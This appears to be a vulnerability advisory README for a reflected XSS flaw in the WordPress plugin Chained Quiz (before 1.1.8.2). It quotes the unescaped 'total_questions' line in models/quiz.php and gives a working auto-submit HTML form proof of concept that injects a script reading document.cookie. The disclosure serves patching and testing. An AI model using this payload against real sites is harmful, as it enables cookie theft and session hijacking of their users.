| .. | |||
| README.md | Loading last commit info... | ||
README.md
Chained Quiz < 1.1.8.2 - Unauthenticated Reflected XSS
Description
WordPress Plugin Plugin Chained Quiz before 1.1.8.2 suffers from a Reflected XSS vulnerability in the 'total_questions' POST parameter when a user completes a quiz.
The code in question accepts the 'total_questions' parameter without escaping the special characters:
models/quiz.php
$output = str_replace('{{questions}}', $_POST['total_questions'], $output);
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="answer" value="x " />
<input type="hidden" name="question_id" value="1" />
<input type="hidden" name="quiz_id" value="1" />
<input type="hidden" name="post_id"a value="5" />
<input type="hidden" name="question_type" value="radio" />
<input type="hidden" name="points" value="0" />
<input type="hidden" name="action" value="chainedquiz_ajax" />
<input type="hidden" name="chainedquiz_action" value="answer" />
<input type="hidden" name="total_questions" value="1v4918<script>alert(document.cookie)</script>eyjfw" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>